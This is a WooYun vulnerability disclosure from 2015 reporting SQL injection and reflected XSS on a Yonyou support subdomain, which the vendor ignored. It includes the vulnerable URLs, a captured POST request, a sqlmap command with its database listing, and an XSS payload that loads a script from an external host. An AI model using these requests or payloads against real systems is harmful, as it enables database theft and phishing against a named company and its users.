当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096443

漏洞标题:用友某子站SQL注入

相关厂商:用友软件

漏洞作者: 千斤拨四两

提交时间:2015-02-11 17:48

修复时间:2015-02-16 17:50

公开时间:2015-02-16 17:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-11: 细节已通知厂商并且等待厂商处理中
2015-02-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

子站存在几处post注入点及反射xss

详细说明:

http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?Page=2&xinwenlxbh=&XinWenMC=1
http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20080328001
http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20071204001&XinWenMC=1
http://service.yonyou.com/ajax/ajax,UFIDA.Service.ashx?_method=GetChanPinBB&_session=no


POST /AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20061113004&XinWenMC=1 HTTP/1.1
Host: service.yonyou.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://service.yonyou.com/AppWeb/XinWen/XinWen.aspx?xinwenlxbh=XWLX20061113004&XinWenMC=1
Cookie: Hm_lvt_4280908fd6c5e0139940ea31e0eb68e1=1423411490; Hm_lpvt_4280908fd6c5e0139940ea31e0eb68e1=1423445237; ASP.NET_SessionId=gepvgwn2b3lfa445vesgxkmd
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 3210
__LastVIEWSTATE_SessionKey=51ff6eeb-d9a0-4c5f-ae02-7d0cc6f8014a&__ContextPath=%2F&_qam_dialog_control=&__VIEWSTATE=%2FwEPDwULLTE4MjExMjI4MzUPZBYCAgMPZBYKAgUPPCsACQEADxYEHghEYXRhS2V5cxYAHgtfIUl0ZW1Db3VudAILZBYWZg9kFgICAw8PFgIeC05hdmlnYXRlVXJsBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA2MTExMzAwNGQWAmYPFQEM562%2B57qm5paw6Ze7ZAIBD2QWAgIDDw8WAh8CBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA2MTExMzAwNmQWAmYPFQEM5biC5Zy65b%2Br6YCSZAICD2QWAgIDDw8WAh8CBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA2MTExMzAwN2QWAmYPFQEM5aqS5L2T5YWz5rOoZAIDD2QWAgIDDw8WAh8CBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA2MTExMzAwOGQWAmYPFQEM5LiT5a626KeG54K5ZAIED2QWAgIDDw8WAh8CBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA3MDIxMjAxMGQWAmYPFQEM5pyN5Yqh5b%2Br6K6vZAIFD2QWAgIDDw8WAh8CBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA3MTIwNDAwMWQWAmYPFQEM5bm057uT5LiT5Yy6ZAIGD2QWAgIDDw8WAh8CBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA4MDMyODAwMWQWAmYPFQEOTkPmnI3liqHliqjmgIFkAgcPZBYCAgMPDxYCHwIFJlhpbldlbi5hc3B4P3hpbndlbmx4Ymg9WFdMWDIwMDgwMzI4MDAyZBYCZg8VARFOQ%2BS%2FseS5kOmDqOa0u%2BWKqGQCCA9kFgICAw8PFgIfAgUmWGluV2VuLmFzcHg%2FeGlud2VubHhiaD1YV0xYMjAwODAzMjgwMDRkFgJmDxUBDk5D5pyN5Yqh5Lqn5ZOBZAIJD2QWAgIDDw8WAh8CBSZYaW5XZW4uYXNweD94aW53ZW5seGJoPVhXTFgyMDA4MDMyODAwNmQWAmYPFQEOTkPmnI3liqHmoYjkvotkAgoPZBYCAgMPDxYCHwIFJlhpbldlbi5hc3B4P3hpbndlbmx4Ymg9WFdMWDIwMTAwNDMwMDAxZBYCZg8VAQzmlrDpl7vkv6Hmga9kAgkPEA8WBh4NRGF0YVRleHRGaWVsZAUJTWluZ0NoZW5nHg5EYXRhVmFsdWVGaWVsZAUHQmlhbkhhbx4LXyFEYXRhQm91bmRnZBAVDAznrb7nuqbmlrDpl7sM5biC5Zy65b%2Br6YCSDOWqkuS9k%2BWFs%2BazqAzkuJPlrrbop4bngrkM5pyN5Yqh5b%2Br6K6vDOW5tOe7k%2BS4k%2BWMug5OQ%2BacjeWKoeWKqOaAgRFOQ%2BS%2FseS5kOmDqOa0u%2BWKqA5OQ%2BacjeWKoeS6p%2BWTgQ5OQ%2BacjeWKoeahiOS%2BiwzmlrDpl7vkv6Hmga8V6K%2B36YCJ5oup5paw6Ze757G75Z6LFQwPWFdMWDIwMDYxMTEzMDA0D1hXTFgyMDA2MTExMzAwNg9YV0xYMjAwNjExMTMwMDcPWFdMWDIwMDYxMTEzMDA4D1hXTFgyMDA3MDIxMjAxMA9YV0xYMjAwNzEyMDQwMDEPWFdMWDIwMDgwMzI4MDAxD1hXTFgyMDA4MDMyODAwMg9YV0xYMjAwODAzMjgwMDQPWFdMWDIwMDgwMzI4MDA2D1hXTFgyMDEwMDQzMDAwMQAUKwMMZ2dnZ2dnZ2dnZ2dnZGQCDw8PFgIeBFRleHQFDOetvue6puaWsOmXu2RkAhEPPCsACQEADxYEHwAWAB8BAgVkFgpmD2QWBAIBDw8WAh8CBSNYaW5XZW5aUy5hc3B4P0JpYW5IYW89WFcyMDA4MDUyMDAxMGQWAmYPFQEy55So5Y%2BLRVJQ5rex6ICV6KGM5Lia44CA5pWw5o6n5Yi26YCg5LyB5Lia562%2B57qmVThkAgIPFQEKMjAwOC8wNS8yMGQCAQ9kFgQCAQ8PFgIfAgUjWGluV2VuWlMuYXNweD9CaWFuSGFvPVhXMjAwODA0MjMwMDRkFgJmDxUBMueUqOWPi%2Bi9r%2BS7tumbhuWboueuoeaOp%2BWPikJJ5bqU55So5YaN5bGV5paw5aKD55WMZAICDxUBCjIwMDgvMDQvMjNkAgIPZBYEAgEPDxYCHwIFI1hpbldlblpTLmFzcHg%2FQmlhbkhhbz1YVzIwMDYxMTEzMDAyZBYCZg8VATrog5zmjbfpm4blm6Llho3luqbnibXmiYvlub%2FkuJznlKjlj4sg566h55CG5Y2H57qn5Yir5qC357qiZAICDxUBCjIwMDYvMTEvMTNkAgMPZBYEAgEPDxYCHwIFI1hpbldlblpTLmFzcHg%2FQmlhbkhhbz1YVzIwMDYxMTEzMDA0ZBYCZg8VASrnlKjlj4tFUlAtTkPllpznrb7kuK3lm73mnIDlpKfpkr3kuJrkvIHkuJpkAgIPFQEKMjAwNi8xMS8xM2QCBA9kFgQCAQ8PFgIfAgUjWGluV2VuWlMuYXNweD9CaWFuSGFvPVhXMjAwNjExMTMwMDZkFgJmDxUBIOeUqOWPi0VSUO%2B8jU5D562%2B57qm5bm%2F5Lic5b635piOZAICDxUBCjIwMDYvMTEvMTNkAhUPDxYCHwYFFeW9k%2BWJjemhte%2B8muesrDEvMemhtWRkZGyEMyFwK0D9WnQJnixj4cOg5Q7D&textfield=&ddlXinWenLB=XWLX20061113004&TextBox1=1&Button1=+&__EVENTVALIDATION=%2FwEWDwLO25KWDAKnuseIDAL9xZrmBwLW%2FrzLDQKb3c%2FnBALSkNa7CwKd2L%2FlBgKyuYTlAwLl%2Ff2lDQKD9a6lAgLZgOLwBQLS85D9CwLxrNb6AwLs0bLrBgKM54rGBn9%2FiG7ONSGvbs1Lr0qWStvPanIJ


在搜索框提交数据抓取数据包丢到sqlmap里去跑。
虽然是反射性的xss,可用来钓鱼。

http://service.yonyou.com/error.aspx?errinfo=1

漏洞证明:

sql.png


sq1.png


available databases [9]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] test
[*] UFServiceClubData
[*] UFWeb
[*] UFWeb_Dev
[*] We7_CMS
sqlmap.py -r yonyou.txt -p TextBox1 -D We7_CMS --tables


sq.png


http://service.yonyou.com//error.aspx?errinfo=1</textarea>'"><script src=http://t.cn/RwAegK3></script>


xss.png

修复方案:

过滤。。。

版权声明:转载请注明来源 千斤拨四两@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-02-16 17:50

厂商回复:

最新状态:

暂无